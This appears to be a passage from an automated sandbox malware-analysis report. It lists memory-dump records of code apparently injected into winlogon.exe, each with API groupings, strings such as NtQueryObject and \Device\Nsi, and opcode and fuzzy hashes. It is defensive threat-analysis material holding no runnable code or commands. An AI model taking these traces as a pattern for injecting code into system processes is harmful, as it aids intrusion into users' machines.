                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 410 1ca7d29f370-1ca7d29f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 63877a1f626742783a368f55fc0a60ee853d92ff197a70e3001fe82e698bde16
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: B8D0C936B3165483F3019B11D855BD66228FB98705FC04009E949826949F7DC25ACB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 409 1ca7d21f370-1ca7d21f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 408 1ca7d1ef370-1ca7d1ef39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 1b76cae57bb5ede7a876367774aa743c8adcc59447000feee719665bdef6a494
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 2EB17033A5879886FB568F25D400BDAB3A5FB84B99F845016DE09677A4DE36CC42C3C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 4dfdd766fcca42df98d61a964e565b1f4d34243f24fb4b18c15cbeb28bb14d75
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 4EB16D73A5079982FB5A8F26D400BD9B3A5FF44F8AF845016EE4993795DE36C980C383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: b325f62a8c6918293bf4545d48a3dff6da009b34d28f8e70c2f43cb220add978
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 2E31B073600B8486FB618F60E840BEE7360FB84708F84402ADA4E4BB94DF39C149C792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: e36a2929517430e398b6d0cc2adb5a53015578127c4b9c6c466daf903339ad4f
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: FF319E73645B84C6FB618F60E850BEE7360FB84748F84412ADA4E47B99EF39C648C752
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 3da2407669b8f480f8f756b28b7d9b8c2941b422362866d82381332b9e319530
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 3B419B33654B8486EB61CF24E8407DE73A4FB88758F940215EA9D47BA8DF39C156CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 4d4afe448e738d7e3fa105810fe858d9c604cd282fc7a32b4601bf5b3b83ad03
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 4541AC33654B8486FB61CF24E840BDE77A4FB88758F900225EA8D47B99DF39C245CB42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: fa24c3d413903ccc1a3935427bc08479c9ec404d9b3963e817dc7376bfee203b
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 7FA1E433B4478849FB229B759448BED7BA0FB8179DF9841159E4837699CA36C043E7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382
                                                  APIs
                                                    • Part of subcall function 000001CA7D29D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D29C987), ref: 000001CA7D29D275
                                                    • Part of subcall function 000001CA7D2A0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D2A0EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D29DB99
                                                    • Part of subcall function 000001CA7D29D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2B6
                                                    • Part of subcall function 000001CA7D29D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 3ea8621b35377627fdacd7b1a3c1b8087c9e356d7a72d09c49ba8589577fb77f
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: B8813533B4478485FB22DB31A544BDEB791FB847A9F884125AE9D27795CE3AC04393C2
                                                  APIs
                                                    • Part of subcall function 000001CA7D21D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D21C987), ref: 000001CA7D21D275
                                                    • Part of subcall function 000001CA7D220EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D220EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99
                                                    • Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
                                                    • Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
